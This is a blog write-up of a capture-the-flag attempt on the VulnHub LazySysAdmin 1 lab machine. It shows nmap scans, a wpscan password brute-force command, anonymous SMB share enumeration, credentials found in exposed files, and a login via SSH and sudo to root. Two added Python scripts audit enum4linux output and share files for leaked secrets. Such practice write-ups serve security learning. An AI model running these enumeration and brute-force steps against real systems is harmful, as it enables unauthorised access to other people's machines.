NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.


Vulnhub: LazySysAdmin 1 – CTF attempt

2017-10-13 by Neil

I’ve never tried a VulnHub box before. I initially downloaded the Bulldog one but couldn’t even work out what its IP address was! LazySysAdmin 1 caught my eye. Apparently created as the author failed his OSCP – my kind of guy. This one seems to pick up DHCP OK, so I found it on 192.168.3.20.

First off, some nmapping to see what’s there:

Initial Enumeration

(makes it sound like I have a formal plan, which I don’t, but should)

root@kali2017-1:~# nmap -sS 192.168.3.20
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:22 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:CD:54:BA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.61 seconds
root@kali2017-1:~# nmap -sV 192.168.3.20
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-13 08:37 BST
Nmap scan report for 192.168.3.20
Host is up (0.00025s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
MAC Address: 00:0C:29:CD:54:BA (VMware)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

So looks like an Ubuntu box running a web server, SSH, samba shares, a MySQL database (probably for the website) and an IRC server.

This is the bit in the process where I start to worry – lots of things there and I’m not sure which one to go for first. Starting at the top of the list: OpenSSH 6.6.1p1. Googling doesn’t offer up any obvious exploits. I’m sure there is a better way of running service versions through a tool to find these – need to find out.

Apache 2.4.7 – this has exploits by the look of it but the site I looked at had “none” in every instance in the column marked “access gained” so that doesn’t look promising.

So onto the website. Firefox to the IP and a site pops up. Not actually much there. Buttons don’t do anything. Links go nowhere other than a couple of external ones at the bottom of the page.

So now what? Consult my course notes. Doesn’t seem a lot of point in using Burp as no transactions are taking place although maybe its Spider would find things. Dirbuster seems like a better shot. Maybe there are some hidden directories and files, what with it clearly being an unfinished mock-up website. I choose directory-list-2.3-small.txt wordlist as I don’t want to be waiting an age. It immediately starts finding an absolute shed-load of stuff.


It’s running WordPress in the /wordpress directory, we can get to phpmyadmin (a web interface for managing SQL databases) and there are some other folders. Visiting the site:


Is someone trying to tell us something here? Several times? And is his name togie? Jot that down as a possible username for later. Not much else to see here. Maybe give wpscan a spin with a general scan:


WPSCAN

wpscan -u 192.168.3.20/wordpress

The most interesting thing this finds is:

[!] 1 vulnerability identified from the version number
[!] Title: WordPress 2.3-4.8.2 - Host Header Injection in Password Reset
    Reference: https://wpvulndb.com/vulnerabilities/8807

The vulnerability involves setting a different email for password resets. Since this machine is on my network I’m not sure how useful that is.

wpscan -u 192.168.3.20/wordpress --enumerate u
[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
    +----+-------+---------+
    | Id | Login | Name    |
    +----+-------+---------+
    | 1  | admin | Admin – |
    +----+-------+---------+
[!] Default first WordPress username 'admin' is still used

Hooray. We have a login name: admin

wpscan gives some options and one of them is to bruteforce the login with a known username, so I try that:

wpscan --url 192.168.3.20/wordpress --wordlist /usr/share/seclists/Passwords/darkc0de.txt --username admin

That looks like it’s going to take a while and whilst it’s revving my laptop fan, I’ll see what else I can be looking into.

SAMBA shares

Time to dig out my pentesting course notes on null shares. First thing my notes suggest is nmblookup

root@kali2017-1:~# nmblookup -A 192.168.3.20
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE> 
	LAZYSYSADMIN    <03> -         B <ACTIVE> 
	LAZYSYSADMIN    <20> -         B <ACTIVE> 
	WORKGROUP       <00> - <GROUP> B <ACTIVE> 
	WORKGROUP       <1e> - <GROUP> B <ACTIVE> 
	MAC Address = 00-00-00-00-00-00

The <20> entry is the File Server Service, meaning LAZYSYSADMIN is offering SMB shares.

root@kali2017-1:~# smbclient -L //192.168.3.20 -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)

smbclient -L lists the shares and the -N switch tells it not to use a password.

So there is a share there called “share$”. In the meantime I’ve turned off wpscan’s password forcing as I’m scared my laptop will die from heat exhaustion. Now everything is strangely quiet as I pull the next tool from the badly written Word printout I’m working off:

root@kali2017-1:~# enum4linux -a 192.168.3.20
Starting enum4linux v0.8.9 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Oct 13 10:22:10 2017
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.3.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 ==================================================== 
|    Enumerating Workgroup/Domain on 192.168.3.20    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP
 ============================================ 
|    Nbtstat Information for 192.168.3.20    |
 ============================================ 
Looking up status of 192.168.3.20
	LAZYSYSADMIN    <00> -         B <ACTIVE>  Workstation Service
	LAZYSYSADMIN    <03> -         B <ACTIVE>  Messenger Service
	LAZYSYSADMIN    <20> -         B <ACTIVE>  File Server Service
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
	MAC Address = 00-00-00-00-00-00
 ===================================== 
|    Session Check on 192.168.3.20    |
 ===================================== 
[+] Server 192.168.3.20 allows sessions using username '', password ''
 ========================================= 
|    Share Enumeration on 192.168.3.20    |
 ========================================= 
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	share$          Disk      Sumshare
	IPC$            IPC       IPC Service (Web server)
[+] Attempting to map shares on 192.168.3.20
//192.168.3.20/print$	Mapping: DENIED, Listing: N/A
//192.168.3.20/share$	Mapping: OK, Listing: OK
//192.168.3.20/IPC$	Mapping: OK	Listing: DENIED
 ======================================================================= 
|    Users on 192.168.3.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username '', password ''
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\togie (Local User)

The actual output is mahoosive and I’ve stripped most of the crap away. Important things, IMO, are:

  • It allows null sessions
  • We can list and map share$
  • There is a user called nobody (I think?)
  • There is a Unix user called togie

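The triage of the enum4linux output above can be scripted, which is useful when checking your own Samba hosts for anonymous exposure. This is an added example and not part of the original post; the sample output is constructed from the lines shown above, and the smb.conf settings named in the summary are ordinary Samba parameters, not something from this box.

```python
"""Triage enum4linux -a output for anonymous (null-session) exposure.

Added example, not from the original post: the sample output is constructed
from the lines the post shows, and the parsing logic is new.
"""
import re

# Constructed sample, trimmed to the lines the triage cares about.
ENUM4LINUX_OUTPUT = """\
[+] Server 192.168.3.20 allows sessions using username '', password ''
//192.168.3.20/print$\tMapping: DENIED, Listing: N/A
//192.168.3.20/share$\tMapping: OK, Listing: OK
//192.168.3.20/IPC$\tMapping: OK\tListing: DENIED
S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\\*unknown* (8)
S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\\nobody (Local User)
S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\\None (Domain Group)
S-1-22-1-1000 Unix User\\togie (Local User)
"""

NULL_SESSION_RE = re.compile(r"\[\+\] Server \S+ allows sessions using username '', password ''")
# "//host/share<ws>Mapping: X, Listing: Y" (separator is ", " or a tab)
SHARE_RE = re.compile(r"^//\S+?/(\S+)\s+Mapping: (\w+)[,\s]+Listing: (\S+)")
# RID-cycling lines: "<SID> DOMAIN\user (Local User)"
USER_RE = re.compile(r"^S-1-[\d-]+ .+?\\(\S+) \(Local User\)")


def triage(output):
    """Extract what a defender wants: null sessions, shares an anonymous user
    can map or list, and account names leaked through RID cycling."""
    f = {"null_session": False, "mappable": [], "listable": [], "local_users": []}
    for line in output.splitlines():
        if NULL_SESSION_RE.search(line):
            f["null_session"] = True
            continue
        m = SHARE_RE.match(line)
        if m:
            share, mapping, listing = m.groups()
            if mapping == "OK":
                f["mappable"].append(share)
            if listing == "OK":
                f["listable"].append(share)
            continue
        m = USER_RE.match(line)
        if m:
            f["local_users"].append(m.group(1))
    return f


def summarize(f):
    """Turn findings into remediation-oriented one-liners."""
    msgs = []
    if f["null_session"]:
        msgs.append("null sessions accepted: set 'restrict anonymous = 2' and 'map to guest = never' in smb.conf")
    for share in f["listable"]:
        if share != "IPC$":  # IPC$ is always present; file shares are the concern
            msgs.append("share %s is browsable anonymously: require authentication or remove it" % share)
    if f["local_users"]:
        msgs.append("RID cycling leaks local accounts: " + ", ".join(f["local_users"]))
    return msgs
```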
My notes say we can connect to shares with smbclient \\\\host\\sharename -N, with the -N meaning null session (i.e. user/pass not required).

root@kali2017-1:~# smbclient \\\\192.168.3.20\\share$ -N 
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Aug 15 12:05:52 2017
  ..                                  D        0  Mon Aug 14 13:34:47 2017
  wordpress                           D        0  Thu Oct 12 16:23:54 2017
  Backnode_files                      D        0  Mon Aug 14 13:08:26 2017
  wp                                  D        0  Tue Aug 15 11:51:23 2017
  deets.txt                           N      139  Mon Aug 14 13:20:05 2017
  robots.txt                          N       92  Mon Aug 14 13:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 13:39:56 2017
  apache                              D        0  Mon Aug 14 13:35:19 2017
  index.html                          N    36072  Sun Aug  6 06:02:15 2017
  info.php                            N       20  Tue Aug 15 11:55:19 2017
  test                                D        0  Mon Aug 14 13:35:10 2017
  old                                 D        0  Mon Aug 14 13:35:13 2017
		3029776 blocks of size 1024. 0 blocks available
smb: \> 

I’ve got an smb session here and some files and folders, some of which are recognisable from the Dirbuster scan. So looks like this share contains the website stuff. I could use smb commands like get to get the files but I’m gonna try Kali’s file browser first.

Fill in the server details: smb://192.168.3.20/share$ and now I’ve got a much easier way of browsing the share and it satisfies the Windows admin in me. Files first:

todolist.txt: “Prevent users from being able to view to web root using the local file browser” – it’s a bit late for that now son.

deets.txt: “CBF Remembering all these passwords. Remember to remove this file and update your password after we push out the server. Password 12345“

Nothing interesting in robots.txt. I try writing to the share but not allowed.

But we have a password and two usernames: admin and togie. Can I log onto the share using these credentials I wonder? Well not sure really. Using the username togie works but then it accepts any password and commands to write to the share are still not allowed.

I’ll check out the folders. To cut a long story short, there is an important WordPress file called wp-config.php:

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');

So now we have credentials for the MySQL database: Admin and TogieMYSQL12345^^. I try connecting from my Kali box but it says:

ERROR 1130 (HY000): Host '192.168.3.25' is not allowed to connect to this MySQL server

Assuming I’m not doing something wrong (ha ha, good one) then it looks like remote connections are not allowed. Maybe the MySQL creds come in handy later. The securi-tay box used them to get root privs so you never know. Actually, Dirbuster told us about access to phpmyadmin so maybe the creds come in handy there?
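The real lesson of the share is that deets.txt and wp-config.php were readable by anyone, so an audit of what an anonymous share hands out would have caught this before the box went live. The following is an added example, not code from the original post: SHARE_FILES is a constructed in-memory stand-in for the mounted share (contents copied from the post), and the file names and regexes are assumptions for illustration.

```python
"""Find credentials sitting in files that an anonymous SMB share hands out.

Added example, not part of the original post. SHARE_FILES is a constructed
in-memory stand-in for the mounted share$ so that this runs offline; replace
it with a directory walk of a real mount to audit a live server.
"""
import re

SHARE_FILES = {
    "deets.txt": "CBF Remembering all these passwords. Remember to remove this file "
                 "and update your password after we push out the server. Password 12345",
    "todolist.txt": "Prevent users from being able to view to web root using the local file browser",
    "wordpress/wp-config.php": "<?php\n"
                               "define('DB_NAME', 'wordpress');\n"
                               "define('DB_USER', 'Admin');\n"
                               "define('DB_PASSWORD', 'TogieMYSQL12345^^');\n"
                               "define('DB_HOST', 'localhost');\n",
}

# define('NAME', 'value') as WordPress writes it in wp-config.php
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")
# A trailing "Password <token>" note, the form deets.txt uses; an earlier
# "password" mid-sentence is skipped because the token must end the text.
PASSWORD_NOTE_RE = re.compile(r"\bpassword\s*[:=]?\s*(\S+)\s*$", re.IGNORECASE)


def parse_wp_config(text):
    """Return the define()d constants of a wp-config.php as a dict."""
    return dict(DEFINE_RE.findall(text))


def scan_share(files):
    """Return (path, kind, detail) for every file that exposes a secret."""
    findings = []
    for path, text in files.items():
        if path.endswith("wp-config.php"):
            consts = parse_wp_config(text)
            if consts.get("DB_PASSWORD"):
                findings.append((path, "db_credentials", "DB_USER=%s" % consts.get("DB_USER")))
        else:
            m = PASSWORD_NOTE_RE.search(text)
            if m:
                findings.append((path, "plaintext_password", m.group(1)))
    return findings
```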

But before that, let’s try out some of these credentials on the LazySysAdmin box:

Really? That’s it? Weird. So nothing fancy with WordPress or phpmyadmin required? I’m gonna ssh into it now simply because it’s easier to copy and paste the code to this blog.

root@kali2017-1:~# ssh togie@192.168.3.20
The authenticity of host '192.168.3.20 (192.168.3.20)' can't be established.
ECDSA key fingerprint is SHA256:pHi3EZCmITZrakf7q4RvD2wzkKqmJF0F/SIhYcFzkOI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.3.20' (ECDSA) to the list of known hosts.
##################################################################################################
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         # 
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   # 
##################################################################################################
togie@192.168.3.20's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
togie@LazySysAdmin:~$ ls /
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
togie@LazySysAdmin:~$ cd /
-rbash: cd: restricted
togie@LazySysAdmin:~$ cd root
-rbash: cd: restricted
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie# cd root
bash: cd: root: No such file or directory
root@LazySysAdmin:/home/togie# ls
root@LazySysAdmin:/home/togie# cd ..
root@LazySysAdmin:/home# ls
togie
root@LazySysAdmin:/home# cd ..
root@LazySysAdmin:/# ls
bin   dev  home        lib         media  old  proc  run   srv  tmp  var
boot  etc  initrd.img  lost+found  mnt    opt  root  sbin  sys  usr  vmlinuz
root@LazySysAdmin:/# cd root
root@LazySysAdmin:~# ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851

Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie


Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:~# 

In a nutshell: couldn’t get to the root folder. sudo su accepted togie’s 12345 password. Now I have full access and capture the flag.
